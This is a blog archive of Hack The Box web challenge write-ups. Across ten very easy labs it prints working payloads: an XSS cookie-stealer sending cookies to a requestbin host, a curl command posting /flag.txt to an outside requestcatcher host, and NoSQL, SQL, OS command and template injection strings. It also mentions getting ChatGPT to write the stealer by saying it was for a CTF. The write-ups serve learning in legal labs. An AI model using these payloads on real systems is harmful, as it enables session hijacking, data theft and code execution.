Hack The Box Archives

Hack The Box – OnlyHacks

Posted on February 14, 2025February 14, 2025 by haxez

OnlyHacks is a very easy web challenge created by amra13579 on Hack The Box. It requires some knowledge of XSS to complete. Hello world, welcome to haxez and happy valentines day. This challenge was a lot of a fun and was on point for the theme of valentines day. While the box was only released today, it is showing as retired and there is a writeup for it so I’m going to publish this write up too.

OnlyHacks Application Enumeration

Upon spawning the box and visiting the application, I was greeted with a very vibrant site. The only options were to login or sign up for a new account. As a result, I performed a quick check SQL OR injection bypass on the login form but moved on to signing up for the application.

Clicking the sign up link took me through to the registration page. Admittedly, I could play around here and attempt some payloads on the sign up page but I decided not to. Next, I populated the information with dummy information and was able to create an account.

OnlyHacks Authenticiated Enumeration

After registering, I was automatically redirected to the applications backend where I was presented with potential matches. Noticeably, all the images appeared to be AI generated which was very uncanny valley Anyway, that has nothing to do with the challenge so… moving on.

I Got A Match!

Ladies and gentlemen, I did the impossible. I got a match on a dating site. Satire aside, after matching with another “user” you can message them using the inbuilt chat functionality. This is where my hacker spider senses started tingling (I had the peter tingle). As a result, I quickly checked the headers and noticed there was no Content Security Policy header, no HTTP Only on cookies and no XSS protection header.

OnlyHacks Exploit

I knew that the type of attacks was going to be an XSS based cookie stealing exploit. Therefore, I tested a very basic XSS payload and it worked. Now all I needed to do was to craft a payload that stole the victims cookies and sent it to a publicaly accessible webhook.

RequestBin is a free publically accessible webhook so I created my webhook there.

Next, after some convincing that I was using it for a CTF, I used chatGPT (because I’m lazy) to develop a payload.

<script>document.location='http://requestbin.whapi.cloud/1nz1u5u1?c='+document.cookie</script>

I then slid into the victims DM’s and sent them the payload. This caused the screen to go white as my browser also triggered the XSS. However, after refreshing the requestbin URL, I saw that two requests had been made. One from myself and one from the victim.

Session Hijacking

I compared the sessions tokens from each of the requests with my current session token saved in my browser. I took the session token that wasn’t mine, and replaced my browser session token with it.

As a result, I refreshed the page and was logged in to the victims account where she had a DM containing the flag for the challenge.

OnlyHacks Learnings

I don’t have much to say about this one. This was a perfect example of a very easy box. It was easy to understand what to do once logged in. The payload didn’t require any filtering and just worked. All in all this was a very well put togeather box and I enjoyed it a lot. Thanks for reading.

Hack The Box – CandyVault

Posted on February 5, 2025 by haxez

CandyVault is a very easy web challenge created by leanthedev on Hack The Box. Solving this challenge required performing a MongoDB noSQL authentication bypass. Hello world, welcome to haxez where today I will be looking at CandyVault.

CandyVault Application Enumeration

I spawned the instance and fired up OWAPS ZAP. I navigated to the IP address in the browser and had a look around. Other than a login form, there wasn’t much to see on the application except the spooky ghost. I ran an Ajax Spider but that didn’t return much. After that, I ran an active scan which didn’t find anything. Yet another example of why it is important to manually test things as tools don’t always find bugs.

Source Code Review

As my initial attempts to find a vulnerability were fruitless, I download the application files and started going through them. I loaded up the app.py file and didn’t understand what the if statements were doing at all. There was some logic on the login route but I didn’t have a clue what it was doing. So I headed to chat GPT and asked it to help me understand the code.

The vulnerability in this Flask application lies in the MongoDB query inside the /login route:

user = users_collection.find_one({"email": email, "password": password})

Since user input is directly inserted into the query without validation, an attacker can send a malicious JSON payload with MongoDB operators (e.g., {“email”: {“$ne”: null}, “password”: {“$ne”: null}}) to manipulate the query logic. Because $ne: null (not equal to null) is always true, MongoDB returns the first user in the database, allowing an authentication bypass. The attack works only when Content-Type: application/json is set, ensuring Flask parses the input as a dictionary rather than a plain string.

Exploiting CandyVault

With that in mind, I turned on breaks in ZAP and captured a login request. I changed the content type to application/json:

POST http://94.237.54.116:45555/login HTTP/1.1
Host: 94.237.54.116:45555
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/json
Content-Length: 24
Origin: https://94.237.54.116:45555
Connection: keep-alive
Referer: https://94.237.54.116:45555/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

and modified the body to a NoSQLI authenticiation bypass:

{
	"email": {
		"$ne": 0
	},
	"password": {
		"$ne": 0
	}
}

I then clicked continue to forward the request and I was logged in to the application and could see the flag.

CandyVault Learnings

I haven’t done many NoSQLi challenges or boxes before so this was new to me. Or perhaps I have done one before but didn’t understand it all that well. I don’t understand this one all that well either. The code I mean. I understand that the username and password parameters are being passed directly to the query. I understand that the request needs to be converted to content type json in order for the server to understand it, but everything else is still a bit foggy. Hopefully there is an academy module on NoSQLI.

Hack The Box – SpookTastic

Posted on February 4, 2025 by haxez

SpookTastic is a very easy web challenge created by leanthedev on Hack The Box. It requires basic code review and XSS to complete. Hello world, welcome to haxez where today I will be trying to complete the SpookTastic web challenge. Fortunately, this time I was able to download the source code which made things a bit easier.

SpookTastic Application Enumeration

As with all application challenges, I fired up OWASP ZAP, opened Firefox and navigate to the application. I wasn’t sure what the function of the application was. It appeared to have a store where it sold a few products. Furthermore, there was also a register email option at the bottom of the page which is where the vulnerability was. Other than that, there wasn’t much else. I ran an Ajax Spider and Active Scan but it didn’t find much.

Source Code Review

I extracted the downloaded files and opened the app.py file. After reading through the file I noticed that that the API register endpoint had an if statement in it pointing to a blacklist function. If the value submitted to the register input box didn’t pass the blacklist function then it wouldn’t work. I went hunting for the blacklist function and found that it checks to see whether the word script is included. It appeared it was some form of validation on the user input.

Exploiting SpookTastic

Please note that I was not able to complete this challenge in Firefox. For some reason, the popup box didn’t appear when submitting the correct payload. Anyway, in the code there is a function that spawns a window with the flag. I’m not 100% sure about the code that recognises the XSS but that is something I will come back in my own time. Anyway, in order to solve the challenge, you need to trigger an XSS pop up without using the script tag. There are a few payloads that can do this but I used the one below.

<img src=err onerror=alert('haxez')>

That created an alert and gave me the flag to solve the challenge.

SpookTastic Learnings

What’s great about the challenges where you can download the code is that you can see the protection mechanisms in place. One thing I have always struggled with is understanding how payloads bypass protection mechanisms. Everything makes much more sense once you actually see the backend code of the application. Anyway this was a fun challenge.

Hack The Box – TimeKORP

Posted on February 3, 2025February 3, 2025 by haxez

TimeKORP is a very easy web challenge created by makelaris on Hack The Box. This challenge requires performing a remote code execution attack. Hello world, welcome to haxez where today I will be putting my web hacking skills to the test by trying to compromise the TimeKORP very easy web challenge. Unlike some of the other challenges I’ve previously complete, this challenge doesn’t have any files to download. Lets crack on.

TimeKORP Application Enumeration

First, I launched OWASP ZAP (because I’m trying to learn it) and navigated to the provided IP address. Once the application loaded, I was presented with a fairly basic page that displayed the time. After clicking the ‘What is the date?’ link at the top of the page, I was shown the current date. That was the extent of the application functionality.

ZAP It

As I was viewing the application through ZAP, I decided to run the Ajax spidering tool to see if there was any content that I was missing. Other than a an assets and static directory which contained nothing interesting, there wasn’t anything else for me to look at.

As a result, I decided I should active scan the application. Granted, it isn’t always advised to use active scan. This is especially true with pages that contain sensitive functionality. However, these labs were designed to test out tools so that is exactly what I did.

TimeKORP Active Scan

Using the OWASP ZAP browser HUD, I clicked the active scan button and waited for it to finish. As you can see from the image below, ZAP was able to find several issues ranging in severity from informational, low risk, medium risk and high risk. The informational, low and medium risk findings were all fairly standard misconfigurations such as a missing Content Security Policy header. However, the high risk finding was a Remote OS Command Injection vulnerability.

Poking The Bug

I navigated through the HUD to view and replay the request in the browser. The active scan performed a sleep command and I assume it detected that the page took a second to respond thus indicating the application was vulnerable. The URL below is the payload that active scan used to determine there was a vulnerability.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26sleep+1.0%26%27

I modified that code to further confirm the vulnerability by running a few different commands. For example I ran the whoami command which told me I was www.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26whoami%26%27

I ran a few other commands such as uptime to confirm I had code execution as the output on the screen wasn’t all that revealing.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26uptime%26%27

Finding The Flag

This is where things got a bit obscure. I used the ls flag and performed various directory traversals but I couldn’t find the location of the flag. What’s odd is that I could list out the views directory and see the index.php but not the flag. I didn’t think it could be a permissions issue as if I was allowed to read the flag file then I should be able to see it. Furthermore, the flag file didn’t start with a dot so it wasn’t a hidden file either. Anyway, I finally found the flag one directory above and was able to read it using the following URL.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26cat%20../flag%26%27

TimeKORP Learnings

I remember a quote, I think it was from Darknet Diaries. It said that hacking is like trying to navigate a maze in the dark. You have no way of knowing where you’re going or even if you are going in the right way. I’m paraphrasing but that reflects my thoughts on this challenge. When I first started penetration testing and doing web applications I was told never to use Burp Active Scan. They explained it was because it could break applications. I’ve looked at some of the payloads and believe it to be absolutely true. However, I’m trying to adopt a new mindset of active scan where you can but ensure the client has a backup.

Hack The Box – KORP Terminal

Posted on January 28, 2025 by haxez

KORP Terminal is a very easy web challenge created by leanthedev on Hack The Box. This challenges requires knowledge of SQL injection. Unlike previous tasks, we don’t have the option to look at the source code for this challenge. Hello world, welcome to haxez where today I will be attempting to own KORP Terminal.

KORP Terminal Application Enumeration

Upon navigating to the application, we are presented with a blue background and a login box. Thats it. You can view the source code but there isn’t much there to view. I ran OWASP ZAP Ajax spider and active scan against it but it didn’t find anything other than the low hanging fruit of HTTP headers. The application has a login box but that’s it. As a result, I attempted some default creds such as admin admin but no luck.

Attacking The Application

Since there isn’t anything else other than the login form, I’m going to go out on a limb and say that I’m supposed to attack that. There are multiple ways that we could attack it. For example, we could use something like Hydra to try and brute force our way in. However, since we don’t know the username, we could be here all day. Instead, lets assume that it is powered by a database and start with some basic SQL injection attacks. To start with, I input a single quite in to both the username and password box. As shown below, the application is indeed vulnerable to SQL injection due to the lack of prepared statements.

Preparing The Request

To attack the login form, I’m going to sqlmap. However, first I need a valid POST request containing the username and password parameters. Did you know that if you specify an Asterix (*) in the parameters of the request, sqlmap will automatically recognise them as insertion points? I didn’t until today. As you can see below, I found the login POST request in ZAP and copies the request to a file called request.txt.

KORP Terminal SQL Injection

To keep it short and sweet, I ran sqlmap against the request. It automatically identified the insertion points and found that it was vulnerable. Next, I simply told sqlmap to dump the database and eureka! it spat out a username and password hash. As you can see from the image below, the username is admin and the password hash appears to be a bcrypt hash (at least according to hashcat examples).

sudo sqlmap -r request.txt --ignore-code 401 --dump

Hash Cracking

Next, it was time to crack the hash. As per the link above in the hashcat examples, you can find the type of hash and the cracking mode needed to crack it. I used the rockyou wordlist because it is a fairly common wordlist and most of the passwords for these challenges and the boxes tend to appear in there. After a few minutes (running on a vm because noob) I cracked the hash. As you can see from the screenshot below, the password was password123. With the username admin and the newly cracked password, I was able to login and get the hash.

HTB{t3rm1n4l_cr4ck1ng_4nd_0th3r_sh3n4nig4n5}

KORP Terminal Learnings

Not much to say about this one. It was a nice fun quick challenge before I power down for the evening. I suppose a lesson that can be taken from this challenge is not to rely on automated scanners like Burp or OWASP Active Scan. They don’t always find a vulnerability that could easily be found by just submitting a single quotation mark. I find it odd that it didn’t find the error but anyway that’s all from today.

Hack The Box – Phantom Script

Posted on January 27, 2025January 27, 2025 by haxez

Phantom Script is a very easy web challenge created by Xclow3n on Hack The Box. This challenge is simple as the answer is on the page. However, I believe the purpose of this challenge is to understand why one works but not the other. Hello world, welcome to haxez where today I will be exploiting an XSS vulnerability.

Phantom Script Application Enumeration

The application is very basic offering only a search box to search through the different scrolls on the page. To the right of the search box is the vulnerable code. Finally, underneath the vulnerable code are some example payloads. The answer is right there on the page, all you need to do is test the different payloads and eventually the flag will pop up. But why does it pop up.

HTML Child Elements

When we test the first payload of:

<script>alert('Boo!');</script>

The browser renders the script tag as plain text rather than executing it. This happens because the script tag is not treated as a child element of the parent h2 tag. It is instead interpreted as part of the element’s textual content. As a result, the payload does not work for XSS in this case.

However, if we use an img element, it is rendered as HTML because the browser recognises img as a valid child element. The browser parses the img element properly, and attributes like onerror are processed, allowing for XSS execution.

<img src=x onerror="alert('Boo!')">

The Flag

After submitting the payload, click the alert blox to close it and the flag will appear on the screen like magic.

HTB{xS5_iS_34SY_wh4t_d0_you_th1nk?}

Phantom Script Learnings

I must admit that this answered a question that I’ve been struggling with for a long time. It’s great being able to find bugs but understanding why they are there makes finding them easier. Before doing this challenge, I didn’t know that only child elements would work when rendered in a html tag. I suspect I have missed multiple oppertunities to get XSS because of this reason. This is why it is important to do additional reading when going through challenges and boxes.

Hack The Box – Unholy Union

Posted on January 26, 2025January 26, 2025 by haxez

Unholy Union is a very easy box created by Xclow3n on Hack The Box. As the name suggests, we will need some SQL skills to complete this challenge. Hello world, welcome to haxez where today I will be refreshing my SQLi skills and attempting to complete this very easy challenge. I haven’t done proper SQL injection in a while, especially UNION based injection.

Unholy Union Application Enumeration

I started by navigating to the page in my browser. With these challenges, there is usually fairly little to actually enumerate. The vulnerability is tends to be fairly obvious but its exploiting that vulnerability that’s the problem. As you can see from the image below, OWASP ZAP found the SQL injection vulnerability without issue. However, finding the vulnerability and getting the flag are two different problems entirely. I could run SQL map against it and try and dump the whole database. Actually, that’s exactly what I’m going to do.

The Easy Way With SQLMAP

First, I wanted to check if the database was vulnerable so I ran the following command and identified that there were 5 columns.

sqlmap -u http://94.237.54.42:37032/search?query= --level=5 --risk=3

Next, I ran the following command to get the database names. I could have just dumped everything but that would be a lot of data to sort through and would take much longer. As you can see from the results below, I found three databases.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 --dbs

It seemed fairly obvious that the database I needed was called halloween_invetory so I specified that in the next query and used it to dump the tables in that database.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory --tables

With the name of the database and the table I was able to use sqlmap to dump the contents of the table and retrieve the flag. It was fairly ovbious which table contained the flag. As you can see below, I used the following command to dump the flag and complete the challenge.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory -T flag --dump

HTB{un10n_1Nj3ct1on_15_345y_t0_l34rn_r1gh17?}

The Hard Way

I’m not going to go in to too much detail on this method as I have already got the flag. However, in order to perform a UNION based SQL injection you would first identify whether the application is vulnerable. This is often achieved by placing a single quotation mark or a ` in the query to break the syntax. As shown below, the application does produce an error message when breaking the syntax.

Next, you would determine how many columns there are by using NULL value columns. To explain, using the NULL value means no data. Therefore, it should produce an error due to the formatting of the column. Furthermore, if the number of columns is wrong, the database will produce an error. For example, if I used three NULL columns and tried to concatenate in to the fourth column I would get an error.

Gun' UNION SELECT NULL, NULL, NULL, (SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.schemata) -- -

However, if I used 4 NULL columns and then concatinate the results in to the 5th column it works. The syntax would be correct as there are 5 columns. As you can see from the image below, the syntax is correct and the data from the information schema table is dumped.

This method can then be used to find the names of the databases, tables and to eventually select the data from the flag table.

Unholy Union Learnings

I should have spent more time going through this one to do it manually but I’m a bit short on time. It was a fun challenge anyway and it jogged my memory on a few things. I struggled with the injection syntax as it has been a long time since I have done it manually. You could argue that is why we have tools but I don’t think thats a good attitude to have. I understand the vulnerability though and how it is structured. It’s just remembering what to use where.

Hack The Box – WayWitch

Posted on January 25, 2025January 25, 2025 by haxez

WayWitch is a very easy web challenge created by Xclow3n on Hack The Box. To complete this challenge you need an understanding of JWT. Hello world, welcome to haxez where today I am going to complete the WayWitch web challenge. This challenge was a lot of fun and was fairly easy to complete. While I already understood JWT, it was good to refresh that knowledge.

WayWitch Application Enumeration

To load the application, I needed to specify HTTPS. The challenges I have completed so far have all been HTTP. Attempting to connect via HTTP returned a connection reset error. After loading the application, it was evident that it was some type of ticketing system. There was no login or any other functionality.

Source Code Review

The web challenges allow you to download the source code. This allows for a white box style assessment in that you get to see the code behind the application. After downloading the zip file, I opened the routes.js. The routes file typically controls the logic behind navigating the application. For example, index.html is a route. As you can see below, there is a route for tickets.

I attempted to navigate to the tickets route or page and received an error explaining that access was denied and that admin privileges were required. This was expected as the source code of the application has an if statement based on the contents of the session token. As seen above, the if statement checks the session token to see whether username is equal to admin. If it matches, it will allow the user to view the tickets route. With that in mind, I knew that I could forge a JWT cookie to contain the username admin. However, in order to do that we need the JWT secret signing key.

WayWitch Secret

I opened the util.js code and the secret was there. Furthermore, the secret can also be obtained by inspecting the web applications page source. This demonstrates why it is always important to view the page source of an application when testing it. This is something I neglect to do more than I care to admit. However, with this example now demonstrating the importance of doing so, I will be sure to be more diligent.

Forging The JWT

I took the existing cookie from my browser by inspecting the page and heading to the application tab. From there I took the value of the session_token cookie and pasted it in to jwt.io. Next, I updated the username to admin and changed the secret key to the one found in the source code (halloween-secret).

I then copied the returned encoded JWT and pasted it in to the value of the session_token in my browser. Next, I refreshed the page and the spooky black magic had worked. I now had access to the tickets route and could see all the tickets that had been previously submitted. Furthermore, the tickets contained the flag thus allowing me to solve the challenge.

HTB{k33p_th3s3_jwt_s3cr3t_s4f3f_br0}

WayWitch Learnings

This was an very fun challenge. It wasn’t too difficult and the code was easy to understand. It was very obvious that in order to access the tickets page, I needed to meet the conditions set out in the if statement (having the username be admin). With that said, I believe that if I hadn’t found the JWT secret in the page source, I might have got stuck for a bit trying to submit the new cookie without the secret. This was another great web challenge and I’m enjoying going through them. I suspect I will start hitting a wall when I get to the easy and medium challenges.

Hack The Box – Void Whispers

Posted on January 24, 2025 by haxez

Void Whispers is a very easy web challenge created by Xclow3n on Hack The Box. In order to solve it you will need some web and Linux skills. Hello world, welcome to haxez where today I’m looking at Void Whispers. Admittedly, I found the problem from the source code quite quickly but didn’t have a clue how to exploit it.

Void Whispers Application Enumeration

Upon initially navigating to the application, it was fairly obvious where the exploit was going to be. The application takes certain parameters and then appear to update a configuration file somewhere. However, the thing that instantly caught my eye was the path to the send mail binary.

My initial thought was to specify the binary. Then, perhaps I could use the other input fields to specify the command. As a result, I attempted to specify the path to bash and run simple commands like whoami and ls. Neither of them worked, despite how I input the values. I also attempted to active scan the page using Zap but it didn’t find anything.

Source Code Analysis

I’m not great at programming, in fact, I’m dreadful at it. I was surprised that I immediately knew where the vulnerability was as soon as I saw it. Ok, I sort of knew where the vulnerability was. I was right about the location but wrong about the problem. This issue can be found in the IndexController.php file on line 40. As you can see, the output of shell_exec is being passed to the $whichOutput variable.

$whichOutput = shell_exec("which $sendMailPath");
    if (empty($whichOutput)) {
      return $router->jsonify(['message' => 'Binary does not exist!', 'status' => 'danger'], 400);
    }

Now, I initially thought that the vulnerability was going to be due to code not using the absolute path. However, that quickly passed as that would make no sense for the current context. We wouldn’t be able to create our own binary called which.

Void Whispers Exploitation

I am happy to have identified that the code looked like it was an issue. However, the issue was more to do with validation. As you can see from the highlighted code below, the code only validates to see whether there are any spaces. So, provided we can fool it in to accepting spaces, we should be able to append any other command.

Fortunately, Bash has something called an Internal Field Separator or IFS which is exactly what it sounds like. It is a separator or a space. However, this is where I ran into more problems. I tried several commands, but the output of those commands was not returned in the response. This is why Zap did not find the command execution.

Exfiltrating The Data

This type of blind exploit is where I tend to have trouble. If the application does not scream at me that it is vulnerability, then I start to think I am completely wrong and should move on to something else. It is the same with blind SQL injection, blind XSS and any other blind exploit. It is like trying to navigate a maze in complete darkness. This is where the try harder mindset comes in. Anywhere there is this useful application called request catcher that allows you to send request to it. By appending a curl command and cat command to the send mail binary bath we can POST the flag to request catcher.

/usr/bin/curl;curl${IFS}-X${IFS}POST${IFS}heapbytes.requestcatcher.com/test${IFS}-d${IFS}"$(cat${IFS}/flag.txt)"

HTB{c0mm4nd_1nj3ct1on_15_3457_t0_f1nD!}

Void Whispers Learnings

So, for once I can say that finding the exploit was fairly simple. I was surprised that I was able to spot it easily. I am not sure if its because I have worked with PHP previously and was more comfortable reading it. Honestly, it was because shell_exec immediately set of alarm bells as shell is bad right? So that part was not too bad but trying to find a way to exploit it was difficult for me. With that said, I had a lot of fun but have realised that I am out of practise and need to start drilling again.

Hack The Box – Spookifier

Posted on January 22, 2025January 22, 2025 by haxez

Spookifier is a very easy web challenge created by Xclow3n on Hack The Box. To hack it, we will need to exploit Server Side Template Injection. Hello world, welcome to haxez where today we will hack the Spookifier challenge. The challenge has the following introduction:

There’s a new trend of an application that generates a spooky name for you. Users of that application later discovered that their real names were also magically changed, causing havoc in their life. Could you help bring down this application?

Enumerating Spookifier

Upon navigating to the page, we are greeted with a purple web application with some graphics and an input box. Furthermore, the box asks us to input our name so that it can spookify it and produce our new spooky name. After inputting our name, the application appears to output our name but in a different font.

Source Code Review

Back in the Hack The Box portal there is an option to download the files associated with the challenge. Fortunately for me, we live in an age of AI which should more than make up for my complete lack of programming skills. Honestly, I wouldn’t recognise a code vulnerability even if the variable was named exploit_me.

from flask import Blueprint, request
from flask_mako import render_template
from application.util import spookify

web = Blueprint('web', __name__)

@web.route('/')
def index():
    text = request.args.get('text')
    if(text):
        converted = spookify(text)
        return render_template('index.html',output=converted)
    
    return render_template('index.html',output='')

Looking through the code it appears to be a Python web framework or Flask application with Mako which is a templating engine. Furthermore, the purpose of the application is to process user input dynamically and render HTML. At least, that’s what AI is telling me.

Understanding The Vulnerability

The application has a vulnerability because it directly renders user input text in the template using the render_template function, without any input sanitization or validation. I’m not going to dig much deeper than that because that would cause me to go down rabbit holes and its already getting late. However, the vulnerability could potentially be fixed by adding safe_output = Markup.escape(converted) to properly escape the text. With that said, we can try an SSTI payload and see if we get the expected result. As you can see below, I have submitted ${404*2} which if calculated correctly should return Bob or 808.

Understanding The Spookifier Vulnerability

Exploiting Spookifier

Now that we know it is vulnerable, we can get a payload from PayloadAllTheThings and modify it for our purposes. First, we will need to list out the current directory and the directories above it to find the flag.

${self.module.cache.util.os.popen('ls ../').read()}

Then once we know where the flag is, we can modify the payload again to read the flag.

${self.module.cache.util.os.popen('cat ../flag.txt').read()}

HTB{t3mpl4t3_1nj3ct10n_C4n_3x1st5_4nywh343!!}

Spookifier Learnings

So I believe this vulnerability would have been found quickly with either Burp or Zap but as Iron Man once said to Spider-Man…

If you’re nothing without the suit (tools) then you shouldn’t have it

I understand why this application is vulnerable even if I don’t fully understand the Python and Mako templates that make it vulnerable. User input sanitisation is important for all untrusted data being input into an application. Anyway, thats it. Also my spellcheck tools are playing up so there are probably errors sorry.